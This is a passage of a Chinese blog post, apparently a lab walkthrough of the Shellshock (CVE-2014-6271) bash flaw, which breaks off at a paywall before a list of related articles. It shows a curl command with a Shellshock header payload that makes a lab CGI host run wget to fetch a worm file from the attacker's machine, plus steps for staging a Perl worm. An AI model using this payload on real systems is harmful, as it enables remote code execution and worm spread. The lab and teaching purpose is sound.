破壳漏洞的原理与利用

于 2021-10-15 22:12:32 发布
阅读量210 收藏
点赞数
分类专栏: 网络安全学习 文章标签: centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54992237/article/details/120791555
版权

使用ssh登录蠕虫发起者主机(10.1.1.231),执行下面三条命令。命令执行结果如下图所示。

[root@worm-master ~]# tail /var/log/httpd/access_log

[root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi

[root@worm-master ~]# tail /var/log/httpd/access_log

 

1.为了避免自身被感染,向蠕虫表明自己是发起者的身份,我们需要登录10.1.1.231主机,通过下面的命令创建一个文件。

[root@worm-master ~]# touch /tmp/key.txt

2.继续在10.1.1.231上执行下面的命令,可以找到蠕虫程序。

[root@worm-master shockworm]# cd /root/shockworm/

[root@worm-master shockworm]# ls

Shellshock.pl

最低0.47元/天 解锁文章
Grentee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 442
Shellshock远程命令注入
破壳漏洞学习实验
kingkeenkai的博客
04-26 2187
今天在雪城大学的网络实验室学习了著名的破壳漏洞,下面分享一下对此漏洞进行的实战首先在vbox中,我们将两台虚拟机设置为在同一局域网段,不知道如何设置局域网段?点击这里然后我们在被攻击机上建立一个myprog.cgi的文件,在其中写入含有bash调用的代码#!/bin/bash echo "Content-type: text/plain" echo echo echo "Hello World" ...
破壳漏洞实践
Unitue_逆流
03-14 1147
实验简介 实验所属系列:操作系统安全 预备知识 了解Bash Bash(GNU Bourne-Again Shell)是许多Linux平台的内定Shell,事实上,还有许多传统UNIX上用的Shell,像tcsh、csh、ash、bsh、ksh等 等,Shell Script大致都类同,当您学会一种Shell以后,其它的Shell会很快就上手,大多数的时候,一个Shell Script...
破壳漏洞(CVE-2014-6271)综合分析:“破壳漏洞系列分析之二
chengfangang的专栏
10-25 1400
一、“破壳漏洞概述 我们团队于9月25日10时发布了《“破壳漏洞(CVE-2014-6271)综合分析》,并更新了多个版本。在这个过程中,我们的监测采集和样本交换体系发现了大量利用漏洞的扫描攻击、后门投放等行为,并发现了多个与此漏洞相关的恶意代码。 二、网络数据包 基于漏洞的特点,我们利用与高校联合部署的“探云“体系等进行了流量监测。发现了捕获了部分网络攻击行为,下面列举一个攻击包进行
破壳漏洞利用payload—shellshock in the wild
weixin_30273501的博客
09-29 301
FireEye关于破壳漏洞(shellshock)在现实中的利用有一篇文章: shellshock in the wild 原文较长,进行了对CGI利用的详细分析,笔者比较感兴趣的是Shellshock in the wild, 包括反弹shell、植入后门、信息窃取等行为如何实现。笔者从原文中摘出了对应利用方式的HTTP报文,感兴趣的朋友可以看原文获取较详细的分析,也可以自己试着分析一下。笔者...
破壳漏洞修复步骤
10-10
我们相信这不应该影响任何的向后兼容。它当然会影响使用如上所述创建的环境变量的任何脚本,但这么做会被认为是糟糕的编程实践。 Red Hat的安全问题报告修复了Red Hat企业版Linux的这个问题。Fedora也运送了问题修复...
破壳Web扫描安全工具
08-01
一款用于扫描网站的安全工具,扫描并检测网站中存在的漏洞,该程序能检测SQL注入漏洞,跨网站脚本攻击漏洞等一系列网站漏洞
SUSE11.1破壳漏洞补丁
10-09
SUSE11.1破壳漏洞补丁 bash-3.2-147.20.1.x86_64.rpm
破壳漏洞最新linux补丁把谁4.3
10-08
在bash官网更新的最新bash4.3补丁,针对linux
破壳.rar极速扫描器
03-14
网络攻防工具
bash破壳漏洞分析(二)
fly小灰灰的专栏
02-15 2046
1. Bash简介1.1 定义   Bash(GNU Bourne-Again Shell)是许多Linux发行版的默认Shell。1.2 概述   目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“() {”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的
linux 破壳漏洞,Bash破壳漏洞
weixin_42138376的博客
05-21 1115
破壳”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu、Fedora、Amazon Linux、OS X 10.10中均拥有存在CVE-2014-6271(即“破壳漏洞)漏洞的Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下的数据均存在高危威胁。漏洞利用...
ShellShock(破壳漏洞)的简单分析
热门推荐
爱唠叨的老鱼
09-27 1万+
(1)什么是ShellShock? (2)ShellShock漏洞原理。 (3)ShellShock漏洞的危害。 (4)如何修复ShellShock漏洞
破壳漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2759
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
CVE-2014-6271“破壳漏洞利用过程
D-river博客
11-12 9060
前言CVE-2014-6271(即“破壳漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
破壳漏洞(shellshock)分析CVE-2014-6271
aletero的专栏
10-19 4702
破壳漏洞分析
Shellshock(破壳)系列漏洞简要分析及检测
Traxer的学习之路
03-13 4463
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
bash破壳漏洞分析(一)
fly小灰灰的专栏
02-15 3818
1. 简介   bash远程代码执行漏洞,该漏洞会影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat,CentOS,Ubuntu,Debian,Fedora,Amaron Linux,OSX10.10等平台。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与bash交互的多种应用,包括HTTP,OpenSSH,DHCP等。    针对本次漏洞的检测,需
bash破壳漏洞反弹shell
3569
07-29 4797
0x00 破壳漏洞原理在bash里边输入~ export name='() { echo "inside name";}; echo "outside name";'查看环境变量~ env|grep name ~ name=() { echo "inside name";}; echo "outside name";这时你会发现当进入子shell的时候,直接输出 outside name~ bas
破壳”“ios”“tiktok”
最新发布
06-14
破壳”是指动物孵化后从蛋壳中挣脱出来。这个过程是生命的新开始,预示着幸福和新的机遇。在人的成长之路上,也有许多“破壳”的经历,比如毕业、就业、结婚、生子等等,这些经历让我们变得更加坚强和成熟。 “iOS”是苹果公司开发的移动操作系统,目前已经更新到iOS 14版本。随着智能手机的普及,iOS系统成为了重要的移动应用平台之一。iOS操作系统具有稳定性高、用户体验好等优点,得到了众多用户的喜爱。 “TikTok”是一款全球性的短视频社交应用,由中国字节跳动公司开发。在全球范围内,TikTok已经拥有超过20亿的下载量,成为了社交媒体的重要新秀。TikTok以其独特而个性化的内容吸引了全球年轻人的注意,成为了他们记录生活、表达自我、分享快乐的平台。 总之,“破壳”、“iOS”、“TikTok”都是代表着不同的意义和价值的词语,它们在不同的领域中发挥着重要作用。在我们的生活和工作中,我们需要不断学习和使用新的工具和思维方式来适应时代的发展和挑战。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值